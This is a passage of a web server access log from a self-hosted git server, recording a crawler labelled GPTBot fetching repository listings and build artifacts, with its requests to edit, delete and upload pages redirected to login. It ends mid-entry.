"https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&project=-1&sort=oldest&state=all&type=all" -[17/Feb/2026:18:49:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10002] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?project=-1&sort=leastupdate&state=all&type=all" -[17/Feb/2026:18:49:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10007] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&state=all&type=all" -[17/Feb/2026:18:49:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10167] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&project=-1&state=all&type=all" -[17/Feb/2026:18:49:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10175] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&state=all&type=all" -[17/Feb/2026:18:49:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10002] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&project=-1&sort=mostcomment&state=all&type=all" -[17/Feb/2026:18:49:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 9996] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&project=-1&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:18:49:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor" [Client 74.7.227.38] [Length 10883] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build" -[17/Feb/2026:18:49:34 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldPilot/build" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build" -[17/Feb/2026:18:49:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldPilot/build" -[17/Feb/2026:18:49:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot" [Client 74.7.227.38] [Length 10896] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build" -[17/Feb/2026:18:49:35 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldPilot/build" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build" -[17/Feb/2026:18:49:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldPilot/build" -[17/Feb/2026:18:49:36 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_upload/main/GoldPilot/build" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build" -[17/Feb/2026:18:49:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_upload/main/GoldPilot/build" -[17/Feb/2026:18:49:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldPilot/build" [Client 74.7.227.38] [Length 9780] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build" -[17/Feb/2026:18:49:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10012] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&state=all&type=all" -[17/Feb/2026:18:49:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 9999] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:18:49:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9997] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?project=-1&sort=nearduedate&state=all&type=all" -[17/Feb/2026:18:49:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 9999] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&project=-1&state=all&type=all" -[17/Feb/2026:18:49:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10169] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&project=-1&state=all&type=all" -[17/Feb/2026:18:49:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldPilot/build/GoldMonitor" [Client 74.7.227.38] [Length 9807] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor" -[17/Feb/2026:18:49:40 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldPilot/build/GoldMonitor" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor" -[17/Feb/2026:18:49:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldPilot/build/GoldMonitor" -[17/Feb/2026:18:49:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldPilot/build/AssetPilot" [Client 74.7.227.38] [Length 9794] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot" -[17/Feb/2026:18:49:41 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldPilot/build/AssetPilot" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot" -[17/Feb/2026:18:49:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldPilot/build/AssetPilot" -[17/Feb/2026:18:49:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/xref-AssetPilot.html" [Client 74.7.227.38] [Length 526372] [Gzip 19.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot" -[17/Feb/2026:18:49:45 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_upload/main/GoldPilot/build/AssetPilot" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot" -[17/Feb/2026:18:49:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_upload/main/GoldPilot/build/AssetPilot" -[17/Feb/2026:18:49:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/xref-GoldMonitor.html" [Client 74.7.227.38] [Length 522609] [Gzip 19.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor" -[17/Feb/2026:18:49:49 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldPilot/build/AssetPilot" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot" -[17/Feb/2026:18:49:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldPilot/build/AssetPilot" -[17/Feb/2026:18:49:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/AssetPilot.pkg" [Client 74.7.227.38] [Length 11082] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot" -[17/Feb/2026:18:49:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/PYZ-00.pyz" [Client 74.7.227.38] [Length 11101] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot" -[17/Feb/2026:18:49:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/PYZ-00.pyz" [Client 74.7.227.38] [Length 11102] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor" -[17/Feb/2026:18:49:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/EXE-00.toc" [Client 74.7.227.38] [Length 23743] [Gzip 11.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot" -[17/Feb/2026:18:49:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/GoldMonitor.pkg" [Client 74.7.227.38] [Length 11087] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor" -[17/Feb/2026:18:49:52 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_upload/main/GoldPilot/build/GoldMonitor" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor" -[17/Feb/2026:18:49:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_upload/main/GoldPilot/build/GoldMonitor" -[17/Feb/2026:18:49:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/warn-AssetPilot.txt" [Client 74.7.227.38] [Length 14489] [Gzip 4.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot" -[17/Feb/2026:18:49:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/localpycs" [Client 74.7.227.38] [Length 10583] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot" -[17/Feb/2026:18:49:54 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldPilot/build/AssetPilot/xref-AssetPilot.html" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/xref-AssetPilot.html" -[17/Feb/2026:18:49:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldPilot/build/AssetPilot/xref-AssetPilot.html" -[17/Feb/2026:18:49:54 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldPilot/build/AssetPilot/xref-AssetPilot.html" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/xref-AssetPilot.html" -[17/Feb/2026:18:49:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldPilot/build/AssetPilot/xref-AssetPilot.html" -[17/Feb/2026:18:49:55 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldPilot/build/GoldMonitor/xref-GoldMonitor.html" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/xref-GoldMonitor.html" -[17/Feb/2026:18:49:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldPilot/build/GoldMonitor/xref-GoldMonitor.html" -[17/Feb/2026:18:49:55 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldPilot/build/GoldMonitor/xref-GoldMonitor.html" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/xref-GoldMonitor.html" -[17/Feb/2026:18:49:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldPilot/build/GoldMonitor/xref-GoldMonitor.html" -[17/Feb/2026:18:49:56 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldPilot/build/AssetPilot/PYZ-00.pyz" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/PYZ-00.pyz" -[17/Feb/2026:18:49:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldPilot/build/AssetPilot/PYZ-00.pyz" -[17/Feb/2026:18:49:56 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldPilot/build/GoldMonitor/PYZ-00.pyz" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/PYZ-00.pyz" -[17/Feb/2026:18:49:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldPilot/build/GoldMonitor/PYZ-00.pyz" -[17/Feb/2026:18:49:57 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldPilot/build/GoldMonitor/PYZ-00.pyz" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/PYZ-00.pyz" -[17/Feb/2026:18:49:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldPilot/build/GoldMonitor/PYZ-00.pyz" -[17/Feb/2026:18:50:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldPilot/build/GoldMonitor/GoldMonitor.pkg" [Client 74.7.227.38] [Length 44573707] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/GoldMonitor.pkg" -[17/Feb/2026:18:50:04 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldPilot/build/GoldMonitor/GoldMonitor.pkg" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/GoldMonitor.pkg" -[17/Feb/2026:18:50:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldPilot/build/GoldMonitor/GoldMonitor.pkg" -[17/Feb/2026:18:50:05 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldPilot/build/GoldMonitor/GoldMonitor.pkg" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/GoldMonitor.pkg" -[17/Feb/2026:18:50:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldPilot/build/GoldMonitor/GoldMonitor.pkg" -[17/Feb/2026:18:50:05 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_upload/main/GoldPilot/build/AssetPilot/localpycs" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/localpycs" -[17/Feb/2026:18:50:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_upload/main/GoldPilot/build/AssetPilot/localpycs" -[17/Feb/2026:18:50:06 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldPilot/build/AssetPilot/PYZ-00.pyz" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/PYZ-00.pyz" -[17/Feb/2026:18:50:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 